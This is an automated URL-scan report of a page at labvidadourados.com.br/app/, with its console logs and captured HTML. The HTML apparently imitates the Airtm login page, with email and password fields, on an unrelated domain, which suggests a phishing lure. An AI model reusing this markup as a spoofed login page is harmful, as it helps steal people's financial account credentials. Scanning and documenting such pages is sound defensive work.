https://labvidadourados.com.br/app/

ID da verificação
3e16a61e-bd4b-4989-879f-580d94e88796Concluído
URL enviado:
https://labvidadourados.com.br/app/
Relatório concluído:

Ligações · 0 encontradas

Variáveis JavaScript · 3 encontradas

NomeTipo
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject

Mensagens de registo da consola · 2 encontradas

TipoCategoriaRegisto
verbosedom
URL
https://labvidadourados.com.br/app/
Texto
[DOM] Input elements should have autocomplete attributes (suggested: "current-password"): (More info: https://goo.gl/9p2vKq) %o
errornetwork
URL
https://labvidadourados.com.br/favicon.ico
Texto
Failed to load resource: the server responded with a status of 404 ()

HTML

<!DOCTYPE html><html lang="es"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Airtm - Iniciar sesion</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <header>
        <img src="./img/header.png" alt="Header Image">
    </header>
    <div class="container">
        <div class="left">
            <img src="./img/fondo.jpg" alt="Left Image">
        </div>
        <div class="right">
            <form id="loginForm">
                <img src="./img/arrb.png" alt="">
                <span>Email</span>
                <input type="text" id="email" placeholder="  [email protected]">
                <span>Ingresa el correo asociado con tu cuenta </span>
                <br><br>
                <span>Contraseña</span>
                <input type="password" id="password" placeholder="  Escribe tu contraseña">
                <br>
                <button class="button" type="submit" id="submitBtn">Iniciar sesión</button>
                <br>
                <a href="">¿Olvidaste tu contraseña?</a>
                <br>
                <p>¿Aún no tienes cuenta? Regístrate</p>
            </form>
        </div>
    </div>
    <script src="script.js"></script>
    


</body></html>